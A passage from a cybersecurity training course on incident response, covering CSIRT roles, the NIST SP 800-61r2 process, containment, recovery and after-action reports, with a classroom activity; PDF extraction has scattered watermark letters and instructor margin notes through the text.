may have experience with service disruption or defacement, while others may be used to more subtle
indicators like network traffic usage and file modification. Rogue accounts and other suspicious
access control behaviors are also common signs that a system or network is under attack.
or
e
at
lic
up
D
ot
N
o
D
Lesson 9: Performing Active Asset and Network Analysis |

10 Responding to
Cybersecurity Incidents
e
ut
ib
tr
is
Lesson Introduction
D
Now that you've performed a comprehensive analysis of your network and other assets, you
need to prepare for what much of this analysis will reveal—the reality of a security incident
or
affecting your organization. Responding quickly, yet cautiously, to the inevitable can make
all the difference in preventing serious, long-term harm to the organization.
Lesson Objectives
e
at

lic
• Design and implement a system to respond to urgent situations by mitigating immediate

and potential threats.
• Employ various protection, prevention, and containment countermeasures to mitigate
up
the effect of incidents.

• Hand over information learned from an incident to a forensic investigation team for
post-mortem analysis.
D
ot
N
o
D

TOPIC A
Deploy an Incident Handling and Response
Architecture
When you have to respond to an incident, you will be able to respond more efficiently and
e
effectively if you already have the right processes, personnel, and tools in place.
ut
Incident Handling and Response Planning
ib
Incident Handling and Before a security incident occurs, your organization should plan and implement an incident handling
Response Planning capability that includes skills, roles, procedures, processes, and tools to respond to security incidents.
Your goal should be to design an incident response plan that enables you to:
tr
• Detect compromises as quickly and efficiently as possible.
is
• Respond to incidents as quickly as possible.
• Identify the cause as effectively as possible.
D
In response to a security incident, your organization should do the following:
• Secure data, while limiting the immediate impact on customers and business partners.
• Contain the incident, preventing any further escalation.
• Identify how the incident occurred. or

• Recover from the incident to return to normal operations as quickly as possible.
• Identify how to prevent further exploitation of the same vulnerability.

e
• Assess the impact and damage to systems, reputation, finances, and so forth.
• Update the organization's security policies and processes as needed, based on lessons learned
at
from the incident.

lic
Documentation
The incident response plan, as well as many of the specific policies, procedures, and guidelines
detailed in this lesson, should be incorporated in your overall organizational documentation. This
up
will ensure that there is an official source for you and your fellow security professionals to follow.
For example, you can document existing security configuration controls. You might be able to
quickly apply these configurations to mitigate the effects of an incident, saving you the time and
trouble of creating new configurations. Or, you may be able to identify when such configurations
D
have failed to prevent an incident from happening and need to be improved or replaced. These
configurations can also include hardening techniques to protect systems during an attack. You
should also document baseline configurations for systems and networks, so you can compare the
ot
current state of these assets to the baseline. By going through this preparation, it'll be easier to
identify anomalies that could indicate an incident.
N
Business Continuity Planning (BCP) and Disaster Recovery

Planning (DRP)
o
D
Business Continuity Another major part of the planning process should center on recovering from a disaster or another
Planning (BCP) and large-scale incident. Once you've moved to the recovery phase, you might find it incredibly difficult
Disaster Recovery —and in some cases impossible—to fully recover your systems if you didn't adequately prepare.
Planning (DRP) Business continuity plans (BCPs) and disaster recovery plans (DRPs) are both ways to prepare for
contingencies.
A business continuity plan (BCP) details exactly how an organization ought to continue day-to-
day operations in the event of a service reduction or interruption that causes at least one critical
Lesson 10: Responding to Cybersecurity Incidents | Topic A

operation to fail. These operations can be either manual or automated. Risks cannot be completely
eliminated, nor can every threat be removed, but the organization should make a serious and
organized effort to identify and manage risks to help mitigate the effects of a disaster. The BCP
addresses infrastructure issues such as maintaining utilities, using high-availability or fault-tolerant
systems that can withstand failure, and creating and maintaining offsite data backups. Ideally, this
offsite backup will be sufficiently segmented from your main operations so as to remain unaffected
by a breach or disaster. Rather than rebuilding from the ground up, you can recover quickly and
with greater ease by using this backup.
A disaster recovery plan (DRP) is a policy that defines how people and resources will be
e
protected in a disaster, and how the organization will recover from the disaster. In any disaster
ut
situation, the safety of personnel is the first concern, regardless of the implications for physical and
information security. The DRP can include a list of individuals responsible for recovery, an
inventory of hardware and software, and a series of steps to take to respond to the disaster and
ib
rebuild affected systems.
Note: You may also have existing contingency strategies in the organization. You should review
tr
these and incorporate any parts that are still useful and relevant into your formal BCPs and
DRPs.
is
Site Book
D
A similar idea, and another good way to plan for disaster, involves creating a site book. A site book Site Book
is a document or collection of documents that take stock and inventory of all known assets,
or
configurations, protocols, and processes that make up a particular site. Instead of directly rebuilding
as in an offsite backup (which may not be feasible for your organization), a site book will enable you
to reconstruct your systems as they were, since no one person is likely to remember the thousands
of little intricacies in the organization's setup.
e
Information to include in site books:
at
• Hardware (serial numbers, MAC addresses, drive type/size, CPU type/speed, etc.)
• Software (operating systems, applications, scripts, add-ons, etc.)
lic
• Network infrastructure (cabling, switches, routers, etc.)

• Physical infrastructure (power supplies, tables, chairs, shelving, etc.)
• Warranty information (dates, vendors, receipts, registration information, etc.)
up
• Configurations (IP addresses, organization layout, distribution, configuration files, etc.)

• Administrative credentials (user names, passwords, tokens, etc.)
Collecting and recording all this information can seem like a daunting task, so it may be best to
D
automate the process. Likewise, you need a process in place to update the records any time
something changes. The information in your site book will undoubtedly be highly sensitive and
mission critical in nature, so its security is paramount. Employ strong encryption to prevent this
ot
information from leaking.

Note: Some organizations track this information in a configuration management database.
N
o
The Incident Response Process

D
The process of responding to an incident consists of several steps. These steps may vary from The Incident Response
organization to organization. NIST SP 800-61r2, Computer Security Incident Handling Guide, which is Process
considered one of the most authoritative sources for incident response, outlines the following
process:
1. Preparation
2. Detection and analysis

3. Containment, eradication, and recovery

4. Post-incident activity
e
ut
ib
tr
Figure 10-1: The NIST SP 800-61r2 incident response process.
is
Note: The incident response process is not always one directional—you can return to other
D
steps if you need to, as indicated in the figure.
Security Operations
Center (SOC)
Security Operations Center (SOC)
or
A security operations center (SOC) is a location where security professionals monitor and protect
critical information assets in an organization. SOCs are vital to security management because they
e
centralize and streamline the organization's security efforts to maximize its effectiveness. Because
at
SOCs can be difficult to establish, maintain, and finance, they are usually employed by larger
corporations that must protect serious sensitive information, like a government agency or a
healthcare company that deals in personally identifiable information (PII).
lic
SOCs, despite their differences in size, scope, and responsibility, tend to be designed with a few key
principles in mind. An SOC should be:
up
• Equipped to perform incident response duties.

• Supported by organizational policies, giving it the authority it needs to be effective.
• Aware of the strengths and limitations of each tool it uses.
• Aware of the nuances involved in monitoring to be able to separate the signal from the noise.
D
• Able to balance its size and its presence in the organization, without overstepping its bounds.
• Able to incorporate a wide variety of security processes into a single operations center.
ot
• Prepared to leverage its strongest processes while minimizing the use of its weakest ones.
• Staffed with motivated, skilled professionals and not overstaffed with under-qualified personnel.
• Able to protect the SOC's own systems and infrastructure from attack.
N
• Willing to collaborate with other SOCs to share valuable information on threat intelligence and
mitigation techniques.
o
Cybersecurity Incident Response Team (CSIRT)

D
Cybersecurity Incident Organizations will often form a cybersecurity incident response team (CSIRT) to help identify
Response Team and manage information security incidents. The individuals that make up the CSIRT are trained in
(CSIRT) proper collection and preservation techniques for investigating security incidents. NIST SP 800-61r2
identifies the following models for organizing such a team.

CSIRT Model Description
Central team One team handles incidents on behalf of the entire organization. This
approach is suitable for small organizations that are not geographically
dispersed.
Distributed team For larger or geographically dispersed organizations, it may be more
appropriate to have individual CSIRTs for different segments of the
organization or different geographic locations. The organizational
reporting structure, processes, policies, and personnel should coincide
e
among the various teams to ensure there is a consistent response across
ut
the organization, with information shared among the various CSIRTs.
Coordinating team An overarching central team can be added to provide guidance and
coordination among distributed teams.
ib
CSIRT Roles
tr
Regardless of the organizational model, members of the CSIRT may have certain roles and CSIRT Roles
is
responsibilities.
D
Role Responsibilities
Manager/team leader Supervises the CSIRT and ensures all team members are performing to
the best of their capabilities.
Investigator
Security specialist
or
Attempts to discover the impact and source of an incident.
Provides technical support to other team members when dealing with
e
specialized systems.
at
Help desk staff Provides technical support to employees and customers affected by an
incident.
Crisis communicator Effectively communicates to stakeholders the important details of an
lic
incident.
Auditor Reviews and evaluates existing security policies, procedures, and
up
mechanisms to ensure they are being followed during an incident

response.
Legal counsel/liaison Assists in providing legal advice or communication to legal authorities
D
when an incident is deemed criminal.

Software developer Builds and maintains tools that the CSIRT uses. May also leverage
artificial intelligence (AI) and machine learning tools.
ot
Ongoing Training
N
It's true that all personnel, regardless of cybersecurity expertise, should be trained according to their
roles. This goes doubly for the CSIRT—the continuity of the business may depend upon every
member of the response team being kept up to date on the latest threats and countermeasures. A
o
team unprepared to combat the current threat landscape will not be running optimally, and may put
the organization in jeopardy in the face of a new type of attack. Therefore, members of the CSIRT
D
should undergo regular training, preferably every six months. The training regimen should not just
include an update on the threat landscape, but should also assess each member's technical aptitude
and ability to work with colleagues in a team.
External CSIRTs
Various factors may prevent your organization from forming and managing its own CSIRT. Having
yet another team to manage and support financially isn't always feasible, especially since CSIRTs

need to be ready at all times. That's why it may be in your best interest to outsource your CSIRT to
a business that specializes in incident response. Just keep in mind that it can be a challenge to
smoothly integrate an external source into your organization, so you still need to be prepared to
facilitate the CSIRT's needs when an incident does occur. If the incident transitions into a forensic
investigation, you may also need to retain the incident response provider so they can provide
thorough and accurate testimony to law enforcement. There is also a possibility that your CSIRT
will be a mix of both internal and external personnel.
A Day in the Life of a CSIRT
e
ut
A Day in the Life of a It might seem obvious that the daily tasks of a CSIRT would consist of responding to computer
CSIRT security incidents, but in fact there are many different types of activities a CSIRT performs that may
not seem obvious from their title. Within any given day, a CSIRT member may need to perform the
ib
following types of tasks.
Task Description
tr
Take immediate action A first response includes taking actions such as:
is
in response to incidents
• Protecting systems and networks from intruder activity.
• Implementing response or workaround strategies.
D
• Examining other systems and networks to find additional signs of
intruder activity.
• Restoring systems and network operations, including patching,
Perform analytical and

problem-solving tasks
or
repairing, and rebuilding systems.
A first response includes analysis tasks such as:
• Identifying appropriate measures that will protect systems and
e
networks from intruder activity.
at
• Monitoring or researching relevant advisories or alerts for solutions

and mitigation strategies.
• Devising new response or workaround strategies as needed to deal
lic
with emerging threats.

• Identifying other operations that should be performed to detect
additional related attacks.
up
Communicate CSIRT members often must coordinate with and call upon the expertise
effectively and skills of others, such as:
D
• Other CSIRT members.

• Others within the organization, such as IT technology functions,
compliance, business operations, and facility security.
ot
• Consultants and vendors.

Adapt to change Members of the CSIRT must be able to adapt and think outside the box
N
because the cybersecurity landscape changes so rapidly.

Conduct tabletop A tabletop exercise is a meeting to discuss potential emergency
exercises scenarios and security incidents. Members of the CSIRT consider
o
theoretical or hypothetical situations to come to a consensus on the

appropriate responses to those situations. What the CSIRT decides in
D
tabletop exercises will help them when the theoretical becomes reality.
Protect evidence, In the process of responding to a cybersecurity incident, the CSIRT must
privacy, and be careful not to destroy evidence if a crime has occurred in connection
confidentiality with the incident. The CSIRT must also be careful not to compromise
data that's meant to be kept private or confidential.

Communication within the CSIRT

Once a security incident has occurred, communication is key to carrying out the plans your CSIRT Communication
organization has developed for such cases. Having a set process for escalating communication will Process
facilitate the knowledge and teamwork needed to resolve the incident and bring the organization's
operations back to normal.
To develop a communication process:
1. Identify internal individuals and other trusted parties who need to be contacted in the event of a
e
security incident. Record this information in a call list, and ensure the list is up to date.
2. Identify external individuals who need to be contacted in the event of a security incident,
ut
including any legal or regulatory agencies. Also record this information in a call list.
3. Determine when to notify the CSIRT members.
4. Determine when to escalate issues to more appropriate personnel, determine who those
ib
personnel are, and how to communicate the necessary information to them (e.g., by filling out
forms/checklists, directly contacting them by phone, etc.).
tr
5. Determine the secure channel(s) to use in primary communications.
6. Establish protocols for communicating out of band; that is, communicating through other secure
is
channels in case the primary channel is compromised.
7. Ensure that parties with privileged information do not release this information to untrusted
D
parties, whether intentionally or inadvertently.
8. Document and train individuals in the process.
9. Test the process and revise any part that fails during testing.
or
It's important to note that communication is not a function of one single phase; it occurs
throughout all phases of an incident, and is therefore something that you should support
continuously.
e
Internal and External Communication Plans
at
There are many different individuals with many different roles that could possibly be involved in an Internal and External
lic
incident that the CSIRT responds to. You might consider these individuals to be in the way, but you Communication Plans
shouldn't discount the context they can provide to the team during and after an incident. You
should therefore develop internal and external communication plans that address these individuals.
The following are some examples of internal and external stakeholders that could be relevant to
up
your response efforts:

• Any individual victims (beyond the company itself) that were affected by an incident:
This might include general staff or management that had their work or personal lives disrupted
D
by an incident. It can also include customers whose PII was stolen in a breach.
• Internal departments like HR and marketing that may need to communicate the incident
to employees and customers: You may be required by laws or regulations to disclose certain
ot
information to affected parties.

• Stockholders: An impact to business will affect the organization's stockholders, if it is
N
incorporated. You may be called on to communicate to stockholders how an incident will

negatively affect profits.
• The media: Depending on the size of your organization and the impact and scope of the
o
incident, you may be obligated to inform the public of what happened. In these circumstances,
it's likely you'll need to go through the news media to reach as many affected parties as possible.
D
• The potential perpetrators of an incident: While they may deny their involvement, you can
still learn something about an incident based on their responses. Some may even confess and
provide you with crucial information, but you should consider that this information may be
inaccurate.
• Local law enforcement: The authorities can provide services to assist in your incident handling
efforts, or you may simply want to communicate the situation to them to prepare for legal action
in the future.

• System administrators: These personnel know better than anyone about the normal baseline
behavior for the network and its systems, so their input can be a great help in identifying a cause
and restoring operations.
• Managers and executives: It may be necessary to escalate certain response efforts up the chain
of command. These decision makers are ultimately in control of the organization, and incident
handling decisions that could profoundly affect operations should not be made without their
approval.
• Vendors you have a business relationship with: If an incident impacts a particular product or
group of products by one or more vendors, those vendors may be able to provide you with
e
support. Security vendors also offer tools and guidance to customers who may be experiencing
an incident.
ut
• Other CSIRTs and computer emergency response teams (CERTs) that can provide
valuable intelligence that may influence your response process: The sharing of knowledge
ib
with like-minded teams can drastically improve your efforts to identify, mitigate, and recover
from an incident.
tr
When communicating with these parties, a little grace will go a long way. Each of your CSIRT
members should be able to keep a level head and manage conflicts, no matter the circumstances.
Treating any one of these parties poorly may undermine the success of the incident response and
is
investigation.
D
Incident Identification
Actually identifying an incident has occurred and what its effects are can be the most challenging
Incident Identification
or
steps in the handling and response process. This is for several reasons, including the fact that
different detection mechanisms, both manual and automated, have varying levels of sensitivity and
accuracy. The success of these mechanisms will also depend on whether a threat is known or
e
unknown—an attack that has no precedent will be difficult to identify in a timely manner, or may
completely sidestep detection. Another major issue is that, depending on the size of an organization
at
and the nature of its assets, the number of alerts security personnel receive may be so large they
cannot be easily analyzed. How to prioritize incidents in case many occur at the same time may also
be an important issue that needs solving. Lastly, it may be essential for a first responder to have very
lic
esoteric knowledge of certain systems and the context in which those systems are put in place in the
organization. There may simply not be enough personnel with the required expertise.
up
Nevertheless, it is your job as a first responder to identify when a breach has occurred. To do so,
you must be on the lookout for indicators of compromise based on the data you've collected. As
you've seen, indicators of compromise (IOCs) come in many forms and come from many sources,
so it's vital that you're aware of every security asset your organization uses.
D
Incident Indicator Sources

ot
Incident Indicator The following table lists additional IOCs, both technical and non-technical, and the potential source
Sources of each IOC.
N
Use this as an
opportunity to provide Source Indicator Example
more examples or
sources, and ask Anti-malware software An alert generated when a virus signature is detected on a host
o
students if they have any system.

to contribute.
D
Network intrusion detection An alert generated after an automated port scan is detected.
system/network intrusion
prevention system (NIDS/
NIPS)

Source Indicator Example

Host intrusion detection An alert generated after the cryptographic hash of an important
system/host intrusion file no longer matches its known, accepted value.
prevention system (HIDS/
HIPS)
System logs An entry in the Windows® event log indicates when a user has
signed in to a host.
e
Network device logs An entry in the firewall log indicates a dropped connection
intended for a blocked port.
ut
Security information and event An alert is generated if anomalous behavior is detected in any
management (SIEM) relevant logs.
ib
Flow control device A higher amount of traffic across the network than normal
indicates an attempted denial of service (DoS) condition.
tr
Internal personnel Employee testimony indicates they may have witnessed a breach
in progress.
is
People outside the organization An external party claiming to be responsible for an attack
indicates this is the case.
D
Research Third-party research and vulnerability database information
indicates a new threat that could be targeting your organization.
The Impact and Scope of Incidents or

e
Damage incurred in an incident can have wide-reaching consequences, including: The Impact and Scope
• Damage to data integrity and information system resources. of Incidents
at
• Unauthorized changes and configuration of data or information systems.

• Theft of data or resources.
lic
• Disclosure of confidential or sensitive data.

• Interruption of services and system downtime.
In addition, the impact of an incident can be both tangible and intangible. Tangible consequences
up
would be corrupt data on a storage drive, a deleted list of clients, and stolen passwords. However,
incidents can have more intangible consequences that still cause harm to the organization. For
example, your organization may suffer economic damage by losing potential customers due to
D
website unavailability after a DoS attack. Your company's reputation may even be tarnished if
sensitive customer and employee data is stolen.
It is important not to underestimate the scope of an incident's impact on your organization. To
ot
ascertain the extent of the damage, you should communicate with members of the CSIRT, as well as
other employees, to identify every dimension of the organization that could possibly be affected by
the incident. You may not be aware of every little detail of every employee's day-to-day job, so it's
N
important to include their perspectives in your response.

o
Incident Evaluation and Analysis

D
Incident identification and analysis efforts can be challenging. Even beyond the huge number of Incident Evaluation and
alerts generated daily, many of these alerts may end up being false positives. In the analysis phase, Analysis
you must be able to separate false positives from a real indicator of an incident.
Even if an alert or log entry is not a false positive and actually indicates something adverse has
occurred, this does not necessarily mean this is the result of an incident. Servers fail, workstations
crash, and files are modified due to errors caused by both machines and humans. Yet, these do not
automatically tell you whether your organization has just suffered a significant attack or an accident.

In many cases, it comes down to your judgment as a professional and the consensus of your team.
To aid you in making these judgments, you should not only consult with other security
professionals, but you should also correlate alerts, log entries, and other potential indicators. A
strong correlation will go a long way toward either indicating an incident has occurred or convincing
you that one has not.
An incident analysis can benefit from the following:
• Document all systems within your organization, including hardware, software, utilities, and so on.
This will ensure that nothing slips past your analysis.
e
• Consider these systems in terms of their criticality. Incidents targeting critical systems and
processes may require a different approach to prioritization.
ut
• Consider how the scope of an incident may impact recovery time. Complex and resource-
intensive systems may not be easily restored.
ib
• Set a baseline for normal behavior. This way, you'll be able to compare a system as it currently
exists against the baseline configuration, and if something is off, it will be easier to analyze the
divergence.
tr
• Retain logs from all sources. Incidents are sometimes identified months after the fact. Not
having these logs will severely impact your analysis efforts.
is
• Correlate events, alerts, and other potential indicators across all sources. Finding a pattern of
action that is replicated in both an NIDS and a host's system log will make it easier to determine
D
the method of an attack.
• Research reputable Internet sources for information. Consulting security industry websites and
security-centered forums may provide valuable insight into an incident.
data can complicate your efforts. or

• Filter out irrelevant or inconsequential sources of information. Too many sources with too much
• Properly document analysis findings in a database. Being able to quickly refer back to your
previous results may help you correlate and evaluate data as efficiently as possible.
e
at
Incident Containment
The methods for containing damage when responding to a security incident are unique to the
lic
Incident Containment
incident and the organization, but the following table outlines some of the general approaches.
Containment Method Description

up
Validate the incident The first step should be to actually validate and confirm that an incident
is taking place. You may be subject to false alarms, so you should be sure
of what you're dealing with before you start your containment tasks.
D
Ensuring the safety and The foremost concern of all managers involved with the security response
security of all is the safety and security of personnel. Second, facilities need to be
ot
personnel secured. Once these are done, the CSIRT can continue on with their tasks
to resolve the issue and return the organization's business functions back
to normal.
N
Removing devices Removing a malicious device from an organization's network may help
from the network combat a malicious code attack. By removing a device, you can stop the
when appropriate spread of the attack and contain it to the affected device.
o
Disabling In the event one device has been compromised, you can disable
D
communications communications to other devices to contain further damage. The CSIRT

between network can restore communications once the device is returned to normal
devices services.

Containment Method Description

Disabling network user Temporarily disabling users' network accounts may prove helpful in
accounts containing damage in the event an intruder is detected within the
network. Without privileges to access resources, an intruder will not be
able to further damage or steal information from the organization. The
CSIRT can restore user access after the intruder account is identified and
terminated.
Disabling email Temporarily disabling email accounts can help keep destructive malware
e
accounts from infiltrating an entire network. The CSIRT can restore email once the
ut
known threat is eradicated.
Limiting access to Creating subnets on the network is a proactive step to contain damage by
affected subnets enabling you to quickly identify and disable a portion of the network
ib
without affecting the entire network.
Isolating the Take the compromised system offline without damaging evidence.
tr
compromised system
when appropriate
is
Treating the While waiting for the forensic analyst to arrive, treat the system as one
compromised system would any crime scene by preventing anyone from compromising the
D
as a crime scene system further or destroying evidence.
Incident Mitigation and Eradication

or
After an incident has been identified, analyzed, and contained, you can move on to mitigating and
eradicating it from your systems. This is done with the intent to stop an incident as it is occurring or
Incident Mitigation and
Eradication
e
shut down the negative effects an incident has left behind. In either case, you need to identify which
hosts and other devices are affected, and exactly how they are affected. If, for example, you've
at
isolated specific portions of a network on subnets to stop a computer worm from spreading, you
can begin the process of removing the infection from the affected subnet.
lic
Whatever the situation may be, you must remember your primary goal as a first responder is to
return your operations to normal.
up
Note: Depending on the incident and its effects, containment, mitigation, eradication, and
recovery may all be part of the same process.
D
Incident Recovery
The steps you take to recover from an incident will depend greatly on the nature of the incident, as Incident Recovery
ot
well as the ways in which you prepared for just such an incident. The following are some examples
of incident recovery:
N
• If a malicious user deletes data from a database, you can restore that data if you had been
creating backups. A continuous 1:1 replication of that data will require minimal effort on your
part, but backups made in time intervals may leave some data incomplete or irrecoverable. If
o
possible, identify what you can about the data that was lost in the period of time since the last
backup was performed.
D
• If a distributed denial of service (DDoS) takes down your web servers, you may need to manually
reboot your servers and perform a health check on them before pushing them back to live status.
They should accept incoming connections gradually rather than all at once to prevent the servers
from overloading again. If you identified the source or sources of the malicious traffic, you can
also have the servers filter them.
• If an employee accidentally downloads malware onto their workstation, you can attempt to
remove it with anti-malware software. If the malware persists, you may need to wipe the entire

storage drive and reinstall the operating system. You can only truly recover once the malware is
completely gone from the system, and the user is trained to be more security aware.
In addition to the technical aspects of disaster recovery and business continuity, the CSIRT plays a
number of other roles:
• Provide leadership with information and response strategies: After an incident, the CSIRT
will be concerned with recovering systems and data, how to protect them from further attack,
and so forth. Meanwhile, leadership throughout the organization will consider how the incident
affects their departments or functional areas, and will have to make certain decisions. The
e
organization might have a crisis management team to coordinate an organization-wide response
to crises in general. The CSIRT can provide the crisis management team—comprising decision
ut
makers throughout the organization—with useful information to help them in this process.
• Provide information needed for crisis communications: Standards and regulations may
require specific communications to customers, partners, and various agencies, and good business
ib
practices will also require that you keep various parties informed, including dealing with public
relations or damage control in the press and social media. As various functions within the
tr
organization communicate information internally and externally, they will look to the CSIRT for
information regarding the estimated downtime, the scope of systems and data affected, and so
is
forth.
• Provide follow-up support for customer and partner relations: Following an incident,
customers and partners may have concerns about your organization's security operations. While
D
the organization should take steps to improve security, possibly addressing areas of risk
mitigation, preparedness, response, and recovery, some necessary follow-up may be a matter of
public relations, with the organization looking to security operations for leadership, ideas, and
information to support the effort.
The Post-Incident Phase

or
e
The Post-Incident Phase The last phase of the incident response process is often called the post-incident phase because it
at
occurs after the organization has successfully recovered from the incident. An after-action report
(AAR), or lessons learned report (LLR), is post-incident documentation that includes an analysis
lic
of security events and incidents that can provide insight into directions you may take to enhance
security for the future.
A significant component of your post-incident documentation will be summarizing and providing a
up
description of what happened during an incident. A description tailored to a general audience and
presented at a high level might include details such as the initial investigation into the incident that
determined what the issue was and what effect it was having; the impact and scope of an attack; an
overall timeline log of the incident that reports what happened and when; the general actions taken
D
to contain and mitigate the incident; and more.

There should also be a technical description of the incident that's useful to trained personnel. For
ot
example, a technical description of an attack might include the specific vectors the attack took and
the specific mechanisms it used in compromising certain systems. A technical report might also
include certain key logs as attachments, so trained personnel can easily validate and cross-reference
N
the claims that are made in the report with the actual evidence.
Not only should you describe what happened during an incident and how you responded, but
afterward, you should also document what this incident means for your security and how it might
o
affect your incident response plan. Essentially, you will be identifying the elements of your security
that need improving, and how you can go about improving them in the best way possible. The more
D
you learn from your successes and mistakes, the more fine tuned your judgment will be. This is an
invaluable skill to have, especially if you're called on to solve complex, open-ended problems.

Questions to Answer in an AAR

A large part of drafting the AAR comes in answering a few simple questions. The following are just Questions to Answer in
a few questions that you should ask when writing an AAR: an AAR
• What actions did you take?
• Is this the optimal solution? In other words, is the solution you used a stop-gap measure, or is
this something that you could reproduce consistently and use as a policy?
• Are there more capable solutions out there?
e
• How did the teams react to the issue? Could they have solved the incident more quickly or
efficiently?
ut
• In the event of the same or a similar incident occurring, how would you respond differently?
• Do the answers to these questions necessitate a change in your security policy or an update to
the incident response plan?
ib
• Is there an action plan or remediation plan in place that will enable the organization to actually
implement these corrective actions?
tr
Note: Be sure to avoid assigning blame as part of the AAR. You want to encourage the CSIRT
is
and other personnel to improve, not discourage them.
Root Cause Analysis
D
Another component of an AAR is root cause analysis, or the effort to determine the incident's
catalyst. The most straightforward way to find the root cause is to keep asking the question, "What
or
was the immediate thing that allowed this to happen?" With each answer, you again ask the same
question, "What is the immediate thing that allowed that to happen?" You keep asking this question,
working your way backwards. Typically, the root cause can be uncovered in about six questions.
And typically, there will be more than one root cause.
e
Validation
at
The incident response team has a stake in whether or not the corrective actions they suggest actually
get put into place—after all, they shouldn't need to save the organization from the same type of
lic
incident that could have easily been avoided. That's why some teams go through a validation process
to ensure their suggested controls have the intended effect. The validation process can include
verifying the organization implements security patches in vulnerable systems, reconfigures user
up
permissions to ensure that attackers cannot easily exploit privileges, and implements a vulnerability
scanning regimen. If the response team feels that it did not receive enough actionable information
during an incident, they can also verify that security monitoring and logging services are up to par.
D
Incident Handling Tools

ot
The CSIRT has a number of tools they can use to help handle security incidents. Keeping the toolkit Incident Handling Tools
up to date will contribute to the CSIRT working optimally. The following table lists a few common You may wish to inform
examples. students that many of
N
these tools can also be

Task Common Tools used in a forensics
context, which is
o
Create drive images EnCase, Clonezilla, FTK Imager covered in the next
lesson.
Display network shares BySoft Network Share Browser, NetShareWatcher
D
Manage user rights ManageEngine ADManager Plus, Windows® Users and Groups
control panel
Recover deleted data TestDisk, PhotoRec, Foremost
Sniff/analyze network packets Wireshark, Packetyzer, tcpdump
Crack passwords Cain & Abel, John the Ripper

Task Common Tools

Enumerate active ports Nmap®, Netcat
Guidelines for Deploying an Incident Handling and Response

Architecture
Guidelines for Deploying
e
an Incident Handling and Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the
Response Architecture CHOICE Course screen.
ut
Follow these guidelines when deploying an incident handling and response architecture.
ib
Deploy and Incident Handling and Response Architecture
When deploying an incident handling and response architecture:
tr
• Ensure all of your incident handling efforts are planned and documented ahead of time.
• Draft BCPs and DRPs to ensure you are prepared in the event of a major contingency.
is
• Record asset and configuration information in a site book to aid in reconstructing efforts.
• If relevant to your organization, establish a CSIRT and the roles of each member.
D
• Ensure there is clear communication within the CSIRT.
• Plan for communication with other internal personnel as well as external parties.
• Employ the appropriate techniques for identifying incidents as well as their potential scope and
impact.
or
• Evaluate and analyze the effects of incidents to determine what kind of damage they can do to
the organization.
e
• Apply appropriate techniques to contain, mitigate, and eradicate incidents.
• Begin recovery of affected systems whenever feasible.
at
• Draft an AAR/LLR that identifies issues and suggested improvements in the wake of an
incident.
lic
• Ensure your incident handling toolkit is up to date and complete.

up
D
ot
N
o
D

ACTIVITY 10-1
Developing an Incident Response System
Data File
e
C:\CNX0013Data\Responding to Cybersecurity Incidents\NIST.SP.800-61r2.pdf
ut
Activity: Developing an
Before You Begin Incident Response
System
You'll be using your Windows 10 client in this activity.
ib
Before class starts,
consider printing the
Scenario incident handling forms
tr
One item on your to-do list is to create a formal incident response policy, but you haven't gotten students will fill in, in
around to it yet. This morning, you arrived in the office to concerns from one of your help desk case no printer is
personnel. She tells you Charles called to reset his domain account. He complained that he hadn't
is
available during class.
accessed it since the end of work yesterday, but it was locked when he came in this morning. What This is the start of an
makes this concerning is that Charles is a custodian of the systems that hold plans and schematics ongoing scenario that
D
for Develetech's products in development. spans many activities.
After investigating further, you find there were a number of remote access attempts on Charles'
account at 11:13 p.m. last night from the IP address 67.240.182.117. While looking over the logs for
or
the last 12 hours concerning that server, you find that Pat accessed files in the research and
development system this morning at 7:43 a.m. from an internal workstation, but Pat has been on
vacation for a week.
e
Are you under attack? If so, from where? What is the goal? You will have to develop your incident
response plan on the fly this time. The National Institute of Standards and Technology (NIST) has a
at
framework for incident response that you will lean on for your reactions to this incident.
lic
they can download NIST

1. Designate your CSIRT members. publications at https://
csrc.nist.gov/
a) On your Windows 10 client, from the course data files, open NIST.SP.800-61r2.pdf.
up
publications/sp.
b) Go to and read Section 2.4.4 Dependencies within Organizations (page 26).
Note: You can also navigate to a section by selecting it in the table of

contents.
D
2. What members of the organization will help you deal with the current
ot
incident? Which others would you routinely include in the CSIRT?

A: Answers will vary, but management, IT, human resources, and physical security might routinely be
N
included here.
3. Create an initial incident report.

o
a) In NIST SP 800-61r2, go to Appendix B (page 67 overall, page 58 as indicated on the page).

b) Review the Incident Details list.
D
4. Which of these questions can you answer now?

A: Answers will vary, but might include basics of the event, timestamps, some locations (internal at
least), and the fact the incident is unsolved.

5. What additional questions would you ask about the incident based on what
you know so far?
A: Answers will vary, but they might include: Who is in the office today? What files were taken? Is
there any evidence of proprietary information being posted publicly?
6. Fill out an incident response form.

a) Using your browser, navigate to https://www.sans.org/score/incident-forms.
Hand out the forms you b) In the list of incident handling forms, select Incident Handling Forms - Incident Identification and
e
printed earlier, or have open the PDF.
students print their own,
ut
assuming a printer is Note: Your instructor may have you work in groups to complete the form, and
available. Otherwise, might ask for a volunteer to share a completed example.
you may need to have
ib
students simply c) Fill in the form to the best of your knowledge.
brainstorm ideas instead
of recording them on the 7. Close the web browser.
tr
form.
Consider having the
is
class work together on
filling out the form, rather
than each student
D
completing their own. If
students fill in their own,
have them share their
results with the class.
Since there isn't
necessarily a strong link
yet between the failed
or
e
access attempts on
Charles' account and
at
Pat's successful access

attempt, students may
choose to treat these as
lic
two separate incidents.

Feel free to let students
investigate any of the
up
other forms.
D
ot
N
o
D

TOPIC B
Mitigate Incidents
You've established an infrastructure and capability for incident handling and response. Now you
need to use that infrastructure to deal with events.
e
Countermeasures
ut
A countermeasure is an action taken to defend against the effects of some unwanted event or Make sure to put focus
incident. It is essentially synonymous with the idea of a security control, though "countermeasure" on the fact that some of
ib
has connotations of being more active and direct in its defense. In any case, countermeasures come these mitigation tactics
in the forms of the control categories mentioned earlier—technical, physical, and administrative. can be applied both
They are also applied in ways to prevent incidents from occurring as well as containing and preventively and
tr
responsively.
eradicating incidents that are ongoing.
Countermeasures
is
Incident responders and other security personnel employ countermeasures in many different areas
of the organization. There are some key points to consider when both designing and deploying such
countermeasures:
D
• Document all actions and processes that are required to implement countermeasures.
• Document all tools, technologies, devices, and systems that both implement countermeasures
and are affected by countermeasures.
or
• Identify the security requirements of your systems to help guide what countermeasures are
applicable and necessary.
• Identify areas where systems are able to integrate with countermeasures, or modify those systems
e
to enable such integration.
at
• Identify how certain systems interoperate with one another to ensure your countermeasures do
not have gaps in coverage or have undesired effects on other systems.
• Identify existing safeguards and whether or not they are adequate, including security features
lic
inherent in systems, physical security, personnel security, and so on.

